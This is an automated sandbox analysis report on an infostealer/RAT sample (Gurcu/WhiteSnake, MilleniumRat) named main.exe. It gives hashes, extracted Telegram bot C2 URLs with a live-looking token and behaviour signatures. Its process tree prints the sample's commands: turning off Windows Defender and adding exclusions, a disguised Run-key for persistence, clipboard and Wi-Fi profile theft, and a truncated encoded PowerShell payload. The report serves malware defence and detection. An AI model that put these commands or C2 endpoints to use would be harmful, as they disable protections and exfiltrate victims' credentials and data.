Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 17:48

General

  • Target

    main.exe

  • Size

    25.6MB

  • MD5

    9403791de3f59a172cae8b47c6aecf8b

  • SHA1

    d793a71ebc5aac8756c3e85a4b24b9f1a96d4442

  • SHA256

    43584ea9266aca9cb7c398685c7268594a0af3a961a09b4f3e74e3d1e3406c2a

  • SHA512

    c467ad5f383526f44e123575c4cfcd4a88aada69d04bbd02ffcf8dca4bbbf7f517f9ef145af6979d399614f88b427e42a25086d297d5ff6572ef30e61c80b808

  • SSDEEP

    786432:3bYfjiuF8MrwttA8V/ZVQ2bBjt9MDiXHmc4:3bjMrwttAuVQ2Vjtb4

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590

https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-

https://api.telegram.org/bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:736
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:860
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1152
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2916
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5536
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1228
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1276
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1316
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1348
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1456
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2568
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1468
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1476
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1484
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1636
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1696
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1704
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1800
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1864
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1900
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1908
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1956
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1988
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1692
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2124
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2252
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                    PID:2264
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2440
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2448
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2600
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2660
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2724
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2736
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2744
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2784
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2156
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2716
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3476
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3592
                                                                                        • C:\Users\Admin\AppData\Local\Temp\main.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\main.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2644
                                                                                          • C:\Users\Admin\AppData\Local\Temp\main.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\main.exe"
                                                                                            3⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1596
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI26442\Build.exe -pbeznogym
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1524
                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI26442\Build.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI26442\Build.exe -pbeznogym
                                                                                                5⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3616
                                                                                                • C:\ProgramData\Microsoft\hacn.exe
                                                                                                  "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3980
                                                                                                  • C:\ProgramData\Microsoft\hacn.exe
                                                                                                    "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4872
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI39802\s.exe -pbeznogym
                                                                                                      8⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2248
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI39802\s.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI39802\s.exe -pbeznogym
                                                                                                        9⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3240
                                                                                                        • C:\ProgramData\main.exe
                                                                                                          "C:\ProgramData\main.exe"
                                                                                                          10⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:940
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB229.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB229.tmp.bat
                                                                                                            11⤵
                                                                                                              PID:928
                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                Tasklist /fi "PID eq 940"
                                                                                                                12⤵
                                                                                                                • Enumerates processes with tasklist
                                                                                                                PID:628
                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                find ":"
                                                                                                                12⤵
                                                                                                                  PID:4420
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                  12⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:5348
                                                                                                                • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                                  12⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:2108
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                    13⤵
                                                                                                                      PID:6012
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                        14⤵
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Modifies registry key
                                                                                                                        PID:5988
                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2108 -s 2780
                                                                                                                      13⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:5484
                                                                                                              • C:\ProgramData\setup.exe
                                                                                                                "C:\ProgramData\setup.exe"
                                                                                                                10⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:3168
                                                                                                      • C:\ProgramData\Microsoft\based.exe
                                                                                                        "C:\ProgramData\Microsoft\based.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3940
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:2908
                                                                                                          • C:\ProgramData\Microsoft\based.exe
                                                                                                            "C:\ProgramData\Microsoft\based.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2940
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                              8⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2780
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                9⤵
                                                                                                                  PID:892
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3144
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                8⤵
                                                                                                                  PID:3328
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                    9⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3644
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ERROR OPSS', 0, 'ERROR', 0+16);close()""
                                                                                                                  8⤵
                                                                                                                    PID:60
                                                                                                                    • C:\Windows\system32\mshta.exe
                                                                                                                      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ERROR OPSS', 0, 'ERROR', 0+16);close()"
                                                                                                                      9⤵
                                                                                                                        PID:3156
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎   .scr'"
                                                                                                                      8⤵
                                                                                                                        PID:5056
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎   .scr'
                                                                                                                          9⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4912
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2372
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          tasklist /FO LIST
                                                                                                                          9⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3572
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:1728
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          tasklist /FO LIST
                                                                                                                          9⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4136
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:3044
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1528
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                        8⤵
                                                                                                                        • Clipboard Data
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:3416
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-Clipboard
                                                                                                                          9⤵
                                                                                                                          • Clipboard Data
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4836
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                        8⤵
                                                                                                                          PID:4380
                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                            tasklist /FO LIST
                                                                                                                            9⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4176
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                          8⤵
                                                                                                                            PID:3076
                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                              tree /A /F
                                                                                                                              9⤵
                                                                                                                                PID:3984
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                              8⤵
                                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                              PID:804
                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                netsh wlan show profile
                                                                                                                                9⤵
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                PID:548
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                              8⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:2376
                                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                                systeminfo
                                                                                                                                9⤵
                                                                                                                                • Gathers system information
                                                                                                                                PID:4764
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAg